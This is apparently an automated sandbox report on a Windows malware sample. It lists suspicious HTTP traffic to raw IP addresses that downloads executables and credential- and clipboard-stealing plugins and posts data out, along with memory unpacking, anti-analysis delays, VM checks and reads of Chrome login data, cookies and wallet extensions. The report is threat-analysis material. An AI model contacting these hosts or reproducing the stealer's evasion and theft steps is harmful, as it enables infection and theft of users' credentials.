0	1
__exception__ Nov. 3, 2023, 6:10 p.m.	stacktrace: 0x220d864 0x22087e4 0x2207f40 0x22034a0 0x2203126 0x2201b93 0x2201b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 e0 0f 8f a1 fe ff ff eb 05 e8 98 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x220dc9a registers.esp: 34403196 registers.edi: 42786108 registers.eax: 0 registers.ebp: 34403240 registers.edx: 0 registers.ebx: 42779900 registers.esi: 42786792 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (19 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://167.235.20.126/bjdm32DP/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://167.235.20.126/bjdm32DP/index.php?scr=1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://171.22.28.213/1.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://167.235.20.126/bjdm32DP/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://167.235.20.126/bjdm32DP/Plugins/clip64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.9.171/abd.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://194.169.175.118/trafico.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.196.8.176/7jshasdS/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.196.8.176/7jshasdS/index.php?scr=1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.9.171/haloup.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://5.182.86.30/TEST32.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.9.171/amers.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://171.22.28.213/build2.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://171.22.28.213/TEST32.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.2/race/lom30.exe
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://193.233.255.73/loghub/master
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.124.1/theme/index.php

Performs some HTTP requests (50 out of 76 events)

request	POST http://167.235.20.126/bjdm32DP/index.php
request	POST http://167.235.20.126/bjdm32DP/index.php?scr=1
request	GET http://171.22.28.213/1.exe
request	GET http://167.235.20.126/bjdm32DP/Plugins/cred64.dll
request	GET http://167.235.20.126/bjdm32DP/Plugins/clip64.dll
request	GET http://185.196.9.171/abd.exe
request	GET http://194.169.175.118/trafico.exe
request	POST http://185.196.8.176/7jshasdS/index.php
request	POST http://185.196.8.176/7jshasdS/index.php?scr=1
request	GET http://185.196.9.171/haloup.exe
request	GET http://5.182.86.30/TEST32.exe
request	GET http://185.196.9.171/amers.exe
request	GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
request	GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll
request	GET http://171.22.28.213/build2.exe
request	GET http://171.22.28.213/TEST32.exe
request	GET http://109.107.182.2/race/lom30.exe
request	POST http://193.233.255.73/loghub/master
request	POST http://77.91.124.1/theme/index.php
request	GET https://steamcommunity.com/openid/loginform/
request	GET https://www.epicgames.com/id/login
request	GET https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Fd2aj_zaBVQV&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/login.css?v=0H1th98etnSV&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=english&_cdn=cloudflare&load=effects,controls,slider,dragdrop
request	GET https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=E78TCC6Eu4d1&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=gYtbaAKt6bwQ&l=english&_cdn=cloudflare
request	GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/3.520a7eda.chunk.js
request	GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/main.10a25667.chunk.js
request	GET https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
request	GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
request	GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
request	GET https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=uR_4hRD_HUln&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=RL7hpFRFPE4A&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/css/skin_1/home.css?v=-6qQi3rZclGf&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=eYJYuhv32ILn&l=english&_cdn=cloudflare

Sends data using the HTTP POST Method (6 events)

request	POST http://167.235.20.126/bjdm32DP/index.php
request	POST http://167.235.20.126/bjdm32DP/index.php?scr=1
request	POST http://185.196.8.176/7jshasdS/index.php
request	POST http://185.196.8.176/7jshasdS/index.php?scr=1
request	POST http://193.233.255.73/loghub/master
request	POST http://77.91.124.1/theme/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1799 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:10 p.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000046a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c62000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041c000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01df0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72381000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72382000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00588000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x079ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x079e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x079e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:09 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

A process attempted to delay the analysis task. (2 events)

description	rundll32.exe tried to sleep 195 seconds, actually delayed analysis time by 195 seconds
description	Utsysc.exe tried to sleep 347 seconds, actually delayed analysis time by 347 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (12 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3077565 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3077565 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3077186 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3077186 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3120608 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3120608 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3120288 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3120288 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3119848 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3119848 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3119711 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 6:10 p.m.	number_of_free_clusters: 3119711 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (50 out of 271 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\dfmbcapkkeejcpmfhpnglndfkgmalhik
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gehmmocbbkpblljhkekmfhjpfbkclbph
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldinpeekobnhjjdofggfgjlcehhmanlj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhhldecdfagpbfggphklkaeiocfnaafm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
